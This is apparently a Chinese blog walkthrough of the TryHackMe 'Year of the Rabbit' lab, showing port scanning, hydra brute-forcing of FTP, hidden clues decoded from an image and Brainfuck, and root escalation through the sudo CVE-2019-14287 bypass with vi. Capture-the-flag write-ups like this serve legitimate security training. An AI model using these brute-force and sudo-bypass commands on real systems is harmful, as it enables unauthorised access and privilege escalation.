TryHackMe-Year of the Rabbit

发布于 2022-12-06  194 次阅读


简介:

Time to enter the warren...

房间链接:

https://tryhackme.com/room/yearoftherabbit#

问题:

挑战开始:

首先扫描下端口

nmap -p 1-65535 -sC -sV 10.10.244.5

┌──(root㉿kali)-[~/Desktop]
└─# nmap -p 1-65535 -sC -sV 10.10.244.5
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-06 07:19 UTC
Nmap scan report for ip-10-10-244-5.eu-west-1.compute.internal (10.10.244.5)
Host is up (0.0045s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   1024 a08b6b7809390332ea524c203e82ad60 (DSA)
|   2048 df25d0471f37d918818738763092651f (RSA)
|   256 be9f4f014a44c8adf503cb00ac8f4944 (ECDSA)
|_  256 dbb1c1b9cd8c9d604ff198e299fe0803 (ED25519)
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.10 (Debian)
MAC Address: 02:6B:06:86:8C:BD (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.07 seconds

80端口看扫描结果是apache的默认界面,那么我们先看看21端口
但是尝试了下匿名登录,没成功
回到了80端口上,首先扫描下目录

这里发现了个assert的目录
里面有个视频和style.css
点开视频只是一个音乐
查看style.css的时候发现了线索

访问链接:
这里会被跳转到YouTube


禁用JS

重新访问

这里提示线索在视频里
然而看了几遍视频,并没有什么发现,使用burp来抓包分析
抓包分析的时候发现了一个有趣的东西

访问这个隐藏目录

里面有一张图片,下载下来进行分析

exiftool Hot_Babe.png

└─# exiftool Hot_Babe.png
ExifTool Version Number         : 12.48
File Name                       : Hot_Babe.png
Directory                       : .
File Size                       : 475 kB
File Modification Date/Time     : 2022:12:06 08:07:51+00:00
File Access Date/Time           : 2022:12:06 08:07:51+00:00
File Inode Change Date/Time     : 2022:12:06 08:07:51+00:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 512
Image Height                    : 512
Bit Depth                       : 8
Color Type                      : RGB
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
SRGB Rendering                  : Perceptual
Warning                         : [minor] Trailer data after PNG IEND chunk
Image Size                      : 512x512
Megapixels                      : 0.262

并没有发现什么有用的

接着查看字符串,看看图片里面有没有信息

strings Hot_Babe.png > TEST.TXT

在最下面发现了线索

得知了ftp的用户名
以及密码在下面的字典里面
那么我们使用hydra爆破

hydra -l ftpuser -P pass.txt ftp://10.10.244.5

使用账号密码登陆ftp,里面有个txt,下载到本地查看


这里看了下其他大佬的wp,才知道这是一种编程语言Brain Fuck
正儿八经谁会想到这是个编程语言--
https://www.dcode.fr/brainfuck-language
在上面网站解码

成功得到一个用户的ssh凭证
成功登陆

在另一个用户目录下找到了user flag,但是权限不够,尝试提权

在我们登陆的时候他提示了一句话,让我们找一个目录,目录里面有一个隐藏文件

查看内容

这里我们得到一个密码
尝试切换用户,成功切换,得到了user flag

尝试提权
sudo -l
这里发现存在特权命令vi,但是这儿允许的是除 root 用户以外的任何用户身份运行

这里要利用另一个sudo漏洞CVE-2019-14287
https://www.mend.io/resources/blog/new-vulnerability-in-sudo-cve-2019-14287/

运行命令

sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt

接着esc,输入:!/bin/sh

回车后成功提权

成功获取root flag

答案:

届ける言葉を今は育ててる
最后更新于 2022-12-06